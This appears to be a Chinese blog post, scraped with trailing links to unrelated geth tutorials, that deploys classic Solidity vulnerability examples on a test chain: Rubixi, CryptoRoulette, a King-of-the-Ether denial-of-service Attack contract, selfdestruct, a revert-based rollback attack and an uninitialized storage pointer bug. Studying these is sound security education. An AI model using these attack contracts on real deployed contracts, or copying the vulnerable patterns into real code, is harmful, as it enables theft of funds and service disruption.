     data: '0x60606040526000600155341561001157fe5b5b6102d5806100216000396000f30060606040523615610060576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063539c0f1414610069578063a9059cbb14610073578063aa8c217c146100ca578063c8f73d98146100f0575b6100675b5b565b005b6100716100fa565b005b341561007b57fe5b6100b0600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190803590602001909190505061014a565b604051808215151515815260200191505060405180910390f35b34156100d257fe5b6100da610253565b6040518082815260200191505060405180910390f35b6100f8610259565b005b34600260003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b565b6000600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054821115801561019b5750600082115b156102435781600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254039250508190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055506001905061024d565b6000905061024d565b5b92915050565b60015481565b34600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b5600a165627a7a72305820a24e461a2afcb4a74d1313d9b0f89de5f4079479e350bdbf0dbd3358f5c1909b0029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xab11788d6ba4f6473557fbb9eddfa3f5bbe7effe transactionHash: 0x98831308fe0c78991154368bcf70cf203b4a45a9321b3e87d6dc9e1d04bf5b20

Rubixi漏洞

pragma solidity ^0.4.22;

contract rubixi{
    uint private balance = 0;
    uint private collectedFees = 0;
    uint private feePercent = 10;
    uint private pyramidMultiplier = 300;
    uint private payoutOrder = 0;
    //address private creator;
    address public creator;
    
    function DynamicPyramid(){
        creator = msg.sender;
    }
    function getCreator() public  returns (address){
    return creator;
  }
}
var rubixiContract =  web3.eth.contract([{"constant":true,"inputs":[],"name":"creator","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"getCreator","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"DynamicPyramid","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var rubixi = rubixiContract.new({
     data: '0x6080604052600080556000600155600a60025561012c600355600060045534801561002957600080fd5b506101e0806100396000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806302d05d3f1461005c5780630ee2cb10146100b357806367f809e91461010a575b600080fd5b34801561006857600080fd5b50610071610121565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156100bf57600080fd5b506100c8610147565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561011657600080fd5b5061011f610171565b005b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b33600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505600a165627a7a72305820e14a35a76611bde0e6af783bb3a29b1c275f98ea55d44d72640b31d1613e05690029', 
  
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xef9bd8324a06275cf4ad1721bf1e3e3bbd2ea13f transactionHash: 0xc55c83651f34e706052663a8550a22e998235c224a611c525d8f5ea16ec238e2

CryptoRoulette攻击

// https://github.com/misterch0c/Solidlity-Vulnerable/blob/master/traps/CryptoRoulette.sol
// https://etherscan.io/address/0x94602b0E2512DdAd62a935763BF1277c973B2758

pragma solidity ^0.4.19;

// CryptoRoulette
//
// Guess the number secretly stored in the blockchain and win the whole contract balance!
// A new number is randomly chosen after each try.
//
// To play, call the play() method with the guessed number (1-20).  Bet price: 0.1 ether

contract CryptoRoulette { 

    uint256 private secretNumber;
    uint256 public lastPlayed;
    uint256 public betPrice = 0.1 ether;
    address public ownerAddr;

    struct Game {
        address player;
        uint256 number;
    }
    Game[] public gamesPlayed;

    function CryptoRoulette() public {
        ownerAddr = msg.sender;
        shuffle();
    }

    function shuffle() internal {
        // randomly set secretNumber with a value between 1 and 20
        //secretNumber = uint8(sha3(now, block.blockhash(block.number-1))) % 20 + 1;
        //这里为了方便做实验验证,用固定数字1代替,不再shuffle
        secretNumber = 1;
    }

    function play(uint256 number) payable public {
        require(msg.value >= betPrice && number <= 10);

        Game game;
        game.player = msg.sender;
        game.number = number;
        gamesPlayed.push(game);

        if (number == secretNumber) {
            // win!
            msg.sender.transfer(this.balance);
        }

        shuffle();
        lastPlayed = now;
    }

    function kill() public {
        if (msg.sender == ownerAddr && now > lastPlayed + 1 days) {
            suicide(msg.sender);
        }
    }

    function() public payable { }
}
var cryptorouletteContract = web3.eth.contract([{"constant":true,"inputs":[{"name":"","type":"uint256"}],"name":"gamesPlayed","outputs":[{"name":"player","type":"address"},{"name":"number","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"kill","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"number","type":"uint256"}],"name":"play","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":true,"inputs":[],"name":"ownerAddr","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"lastPlayed","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"betPrice","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var cryptoroulette = cryptorouletteContract.new({
     data: '0x606060405267016345785d8a0000600255341561001b57600080fd5b33600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061007761007c6401000000000261043f176401000000009004565b610086565b6001600081905550565b6104f5806100956000396000f300606060405260043610610078576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063382cf0a61461007a57806341c0e1b5146100e45780636898f82b146100f95780639c675eaa14610111578063c533913214610166578063cfd8a1751461018f575b005b341561008557600080fd5b61009b60048080359060200190919050506101b8565b604051808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020018281526020019250505060405180910390f35b34156100ef57600080fd5b6100f761020b565b005b61010f600480803590602001909190505061028e565b005b341561011c57600080fd5b61012461040d565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b341561017157600080fd5b610179610433565b6040518082815260200191505060405180910390f35b341561019a57600080fd5b6101a2610439565b6040518082815260200191505060405180910390f35b6004818154811015156101c757fe5b90600052602060002090600202016000915090508060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16908060010154905082565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614801561026e5750620151806001540142115b1561028c573373ffffffffffffffffffffffffffffffffffffffff16ff5b565b600060025434101580156102a35750600a8211155b15156102ae57600080fd5b338160000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508181600101819055506004805480600101828161030e9190610449565b916000526020600020906002020160008390919091506000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168160000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600182015481600101555050506000548214156103fa573373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f1935050505015156103f957600080fd5b5b61040261043f565b426001819055505050565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60015481565b60025481565b6001600081905550565b81548183558181151161047657600202816002028360005260206000209182019101610475919061047b565b5b505050565b6104c691905b808211156104c257600080820160006101000a81549073ffffffffffffffffffffffffffffffffffffffff0219169055600182016000905550600201610481565b5090565b905600a165627a7a7230582029d7523a92663fda0e1c1500a9e90438e3ee9f19b84b0d40b6736d9c85e2b5c10029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x7d0721e53dba437ece0f8611696573cf17b75179 transactionHash: 0xbc852383090eb0a78e82a4d6ec0eebe69f7f2d2930f88bc48746880d38b1bb5f

King of the Ether Throne攻击(DOS)

pragma solidity ^0.4.10;

contract PresidentOfCountry {
    address public president;
    uint256 public price;

    function PresidentOfCountry(uint256 _price) {
        require(_price > 0);
        price = _price;
        president = msg.sender;
    }

    function becomePresident() payable {
        require(msg.value >= price); // must pay the price to become president
        president.transfer(price);   // we pay the previous president
        president = msg.sender;      // we crown the new president
        price = price * 2;           // we double the price to become president
    }

}

contract Attack { 
    function () { revert(); }

    function Attack(address _target) payable {
        _target.call.value(msg.value)(bytes4(keccak256("becomePresident()")));
    }
 }

第一个合约PresidentOfCountry:

var _price = 10 ;
var presidentofcountryContract =  web3.eth.contract([{"constant":false,"inputs":[],"name":"becomePresident","outputs":[],"payable":true,"type":"function","stateMutability":"payable"},{"constant":true,"inputs":[],"name":"president","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"constant":true,"inputs":[],"name":"price","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function","stateMutability":"view"},{"inputs":[{"name":"_price","type":"uint256"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"}]);
var presidentofcountry = presidentofcountryContract.new( _price,
{
     data: '0x6060604052341561000c57fe5b604051602080610284833981016040528080519060200190919050505b6000811115156100395760006000fd5b8060018190555033600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b505b6101f1806100936000396000f30060606040526000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680631e1e8f3714610051578063324a13761461005b578063a035b1fe146100ad575bfe5b6100596100d3565b005b341561006357fe5b61006b610199565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34156100b557fe5b6100bd6101bf565b6040518082815260200191505060405180910390f35b60015434101515156100e55760006000fd5b600060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc6001549081150290604051809050600060405180830381858888f19350505050151561014957fe5b33600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506002600154026001819055505b565b600060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600154815600a165627a7a7230582049386a5a90e375f2c14966092170560795fb153ef1eff2214e6fe7157b84d3fe0029', 
    
     from: web3.eth.accounts[0], 
     gas: '10000000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x025b689415e02b896d6cc021ad56ff38e8ae0a93 transactionHash: 0x3109ad838eb20a89f8513f3f411f8872022a8d4d6f2560eff8ad1b0a96e380dc

第二个合约Attack:

部署合约时想传入msg.value即向合约转账

在如下数字10行位置加上value:xxx即可,如果value是最后一个参数,后面不加逗号

var _target = "0x025b689415e02b896d6cc021ad56ff38e8ae0a93";
var attackContract =  web3.eth.contract([{"inputs":[{"name":"_target","type":"address"}],"payable":true,"type":"constructor","stateMutability":"payable"},{"payable":false,"type":"fallback","stateMutability":"nonpayable"}]);
var attack = attackContract.new(_target,
{
     data: '0x606060405260405160208061012e833981016040528080519060200190919050505b8073ffffffffffffffffffffffffffffffffffffffff163460405180807f6265636f6d65507265736964656e742829000000000000000000000000000000815250601101905060405180910390207c01000000000000000000000000000000000000000000000000000000009004906040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180905060006040518083038185886185025a03f19350505050505b505b6045806100e96000396000f30060606040525b3415600c57fe5b60175b60006000fd5b565b0000a165627a7a72305820df530af82568fcd6ab34a79c043e30a64ee0deeb38ad4ac330cfc9e546adb9280029', 
    

     from: web3.eth.accounts[1], 
     gas: '4700000',
     value: 40
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x64a8df8e846d40335b9f3072e4e187568646f879 transactionHash: 0x7effac1203afb6a5b2dd500f3ee8398a9b24611d0dc6f3843da7784040e2831f

call-after-destruct攻击

pragma solidity ^0.4.24;
 
contract selfdestructGame{
    address owner;
 
    constructor() payable {
        owner = msg.sender;
    }
     
    function ownedEth() public constant returns(uint256){
        return this.balance;
    }
     function deposit() public payable{}
 
    function destruct(address _who) public {
        selfdestruct(_who);
    }
}
var selfdestructgameContract =  web3.eth.contract([{"constant":false,"inputs":[{"name":"_who","type":"address"}],"name":"destruct","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"ownedEth","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"deposit","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"}]);
var selfdestructgame = selfdestructgameContract.new({
     data: '0x6080604052336000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061013a806100536000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680631beb26151461005c57806352d225181461009f578063d0e30db0146100ca575b600080fd5b34801561006857600080fd5b5061009d600480360381019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506100d4565b005b3480156100ab57600080fd5b506100b46100ed565b6040518082815260200191505060405180910390f35b6100d261010c565b005b8073ffffffffffffffffffffffffffffffffffffffff16ff5b60003073ffffffffffffffffffffffffffffffffffffffff1631905090565b5600a165627a7a72305820fbdc0b210f7e78e037ba804ab1291f1798da7290fcc6b3e863785f59b06b5ddc0029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000',
     value:1000000000000000000
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x4973329ea175750eb8eb3ce89c6fb4935370e502 transactionHash: 0x4e2df136792bb470ed450355e64d2f4dbf0eb13d03140fd124f415505178672d

回滚攻击

pragma solidity ^0.4.19;

contract Alice{
    function random() internal returns (uint8){
        return 11;
    }
   function() payable{}
    function guess(uint8 num) payable public returns (bool){
        require(msg.value >= 1 ether);

        uint8 rand = random();
        if(num > rand-3 && num < rand+3){
            msg.sender.transfer(2 ether);
        }
        else{
          return false;
        }
    }
}

contract Bob{
    function rollback(Alice alice, int8 num) public {
        uint256  balance1 = this.balance;
        bool  isSucceed = address(alice).call.gas(10000).value(1 ether)(bytes4(keccak256("guess(int8)")), num);
        uint256  balance2 = this.balance;
      
        // 没有中奖则回滚
        if(balance2 < balance1){
            revert();
        }
    }
}

第一个合约Alice:

var aliceContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"num","type":"uint8"}],"name":"guess","outputs":[{"name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var alice = aliceContract.new({
     data: '0x6060604052341561000f57600080fd5b6101518061001e6000396000f300606060405260043610610041576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680634ba4c16b14610043575b005b61005c600480803560ff16906020019091905050610076565b604051808215151515815260200191505060405180910390f35b600080670de0b6b3a7640000341015151561009057600080fd5b61009861011c565b90506003810360ff168360ff161180156100ba57506003810160ff168360ff16105b1561010c573373ffffffffffffffffffffffffffffffffffffffff166108fc671bc16d674ec800009081150290604051600060405180830381858888f19350505050151561010757600080fd5b610115565b60009150610116565b5b50919050565b6000600b9050905600a165627a7a72305820e39fa2e1da7684bbe7afc299d2ac9995bcf4d0f408c328a106387893ff5f22240029', 
  
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

第二个合约Bob:

var bobContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"alice","type":"address"},{"name":"num","type":"int8"}],"name":"rollback","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var bob = bobContract.new({
     data: '0x6060604052341561000f57600080fd5b6101d38061001e6000396000f300606060405260043610610041576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680638956bc0a14610046575b600080fd5b341561005157600080fd5b610089600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190803560000b90602001909190505061008b565b005b60008060003073ffffffffffffffffffffffffffffffffffffffff163192508473ffffffffffffffffffffffffffffffffffffffff16612710670de0b6b3a764000060405180807f677565737328696e743829000000000000000000000000000000000000000000815250600b01905060405180910390207c010000000000000000000000000000000000000000000000000000000090049190876040518463ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808260000b60000b8152602001915050600060405180830381858988f194505050505091503073ffffffffffffffffffffffffffffffffffffffff16319050828110156101a057600080fd5b50505050505600a165627a7a72305820566a463b50c26dc01f0cd796d581b0d7d33cf052fe4cd481bd212169e35d17e20029', 
    
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

影子变量攻击

pragma solidity 0.4.26;

contract Shadow {
    bool public unlocked = false;   // slot0

    struct Record{
        bytes32 name;
        address addr;
    }

    mapping(address => Record) public registRecord; //slot1
    event Log(address addr, bool msg);

    function regist(bytes32 _name, address _addr) public {
        Record newRecord; 
        newRecord.name = _name; // slot0
        newRecord.addr = _addr; // slot1

        emit Log(msg.sender, unlocked);
    }
}
var shadowContract = web3.eth.contract([{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"registRecord","outputs":[{"name":"name","type":"bytes32"},{"name":"addr","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"unlocked","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_name","type":"bytes32"},{"name":"_addr","type":"address"}],"name":"regist","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"anonymous":false,"inputs":[{"indexed":false,"name":"addr","type":"address"},{"indexed":false,"name":"msg","type":"bool"}],"name":"Log","type":"event"}]);
var shadow = shadowContract.new({
     data: '0x608060405260008060006101000a81548160ff02191690831515021790555034801561002a57600080fd5b506102c48061003a6000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680630ba2d89b1461005c5780636a5e2650146100ee57806372a987611461011d575b600080fd5b34801561006857600080fd5b5061009d600480360381019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061016e565b6040518083600019166000191681526020018273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019250505060405180910390f35b3480156100fa57600080fd5b506101036101b2565b604051808215151515815260200191505060405180910390f35b34801561012957600080fd5b5061016c6004803603810190808035600019169060200190929190803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506101c4565b005b60016020528060005260406000206000915090508060000154908060010160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905082565b6000809054906101000a900460ff1681565b600082816000018160001916905550818160010160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507fc2b78da6ebaaf30e7b39205082fd41dfc9a310fbfaf5624e77e427c39211c350336000809054906101000a900460ff16604051808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001821515151581526020019250505060405180910390a15050505600a165627a7a723058209d4f2f003f7db6eff32225d2ab6ef2304fb9bccaccfa94f5ed7064ab7aaeb4a60029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42417179/article/details/126878948

以太坊客户端geth的基本操作命令_blockchains-校长的博客-爱代码爱编程

以太坊客户端geth的基本操作命令 搭建了私有链环境之后,整理了一下客户端的一些基本的操作命令: 启动命令 重复上篇博客步骤,先将区块链客户端启动,命令如下: geth –datadir “%cd%\chain” console 看到启动页面之后,新开启一个终端,并执行一下命令,并把日志输出到文本文件

区块链开发:(1)ubuntu 搭建以太坊客户端geth_lv_zj的博客-爱代码爱编程

geth是以太坊的官方客户端,它是一个命令行工具,提供很多命令和选项,可以运行以太坊节点、创建和管理账户、发送交易、挖矿、部署智能合约等 1.安装Ubuntu虚拟机。   官网下载地址: http://www.ubuntu.com  如下图,选择Alternative downloads,向下拉到BitTorrent页,下载种子后,用迅

以太坊客户端geth命令用法-参数详解_芒果汁的博客-爱代码爱编程_geth 参数

Geth是在以太坊智能合约开发中最常用的工具(必备开发工具),一个多用途的命令行工具。 熟悉Geth可以让我们有更好的效率,大家可收藏起来作为Geth命令用法手册。 本文主要是对geth help的翻译,基于最新的geth

以太坊geth客户端安装以及搭建以太坊私链-爱代码爱编程

1、以太坊geth客户端安装 一次执行下面的命令即可安装(如果中间有报错,多半是网络问题,这时候只要安装提示或者再次重复执行下面第三和第四条命令就可以完成安装) sudo apt-get install software-properties-common sudo add-apt-repository -y ppa:ethereum/ethereum

eth geth 安卓_零基础学习以太坊开发--安装和使用以太坊客户端geth-爱代码爱编程

一、预备知识 想从事区块链开发,了解以太坊开发的程序员,在刚开始接触以太坊的时候,发现有很多的新名词: EVM solidity go-ethereum(geth) pyethereum Testrpc Parity Mist Truffle web3.js Swarm Augur MetaMask ethscan 0x

Centos7以太坊客户端Geth安装教程-爱代码爱编程

Centos7以太坊客户端Geth安装教程 一、环境配置 Geth是基于Golang语言写的以太坊客户端,因此需要先安装Golang环境。 下载golang语言压缩包wget https://dl.google.com/go/go1.16.linux-amd64.tar.gz 可以根据不同版本更改url `` 解压压缩包sudo tar -C /

linux以太坊同步,以太坊客户端mist和geth加快区块同步速度的方法-爱代码爱编程

以太坊客户端mist和geth加快区块同步速度的方法 以太坊已经发布了windows下的图形客户端mist和命令行客户端geth,但是中国区发现一个问题,新建一个以太坊账号,目前需要同步170万个区块,速度非常的慢,往往好几天都没有同步完。主要原因就是国内的节点过少,根据 Ethernodes统计,国内以太坊节点数量发文时是143个,而且国内特殊

以太坊客户端Geth(windows)-爱代码爱编程

以太坊客户端Geth(windows) 0.小贴士(solc、linux常用命令) 1.linux系统安装node,并且进行环境变量的配置 安装完成后进行软连接 sudo ln -s /home/leon/node/node-v12.18.1-linux-x64/bin/npm /usr/local/bin/npm sudo ln -s /usr/

CentOS 7 下 以太坊客户端geth的部署-爱代码爱编程

一、golang的安装配置 1.安装golang yum install golang 2.配置go的环境变量 vim /etc/profile 3.在profile文件的最后追加以下内容 # GOROOT export GOROOT=/usr/lib/golang # GOPATH export GOPATH=/root/go/ # GOPA

区块链layer 1与layer 2扩展解决方案_xingxin666.eth的博客-爱代码爱编程

区块链三难困境 加密货币和区块链的普及程度呈指数级增长,用户和交易的数量也在快速增长。 区块链的开放性显而易见,而可扩展性始终是一个挑战。高度去中心化及安全的公共区块链网络往往难以实现高吞吐量。 这通常被描述为区块

j9数字论:以太坊合并后的概念科普_j9说数字的博客-爱代码爱编程

以太坊进入后合并时代,你对以太坊2.0了解多少?本文用15个概念带你深入了解它。 1、信标链(Beacon chain) 信标链向以太坊1.0引入了权益证明,与以太坊1.0并行运行。信标链也被称为协调层。 信标链具有一下作用: 分配验证者的职责 确认检查点 执行协议级随机数字生成器(RNG) 促进信标链运行 投票决定分叉链头 2、Slo

跨链自动化中心 oak network,构建安全高效 web3 基础设施_oneblock community的博客-爱代码爱编程

跨链自动化中心 OAK Network,构建安全高效 Web3 基础设施 互联网范式不断迭代,以“可读+可写+拥有”为特征的 Web3 锋芒初露。关于 Web3 走向众说纷纭,毋庸置疑的是去中心化网络的正确运行将要求系统能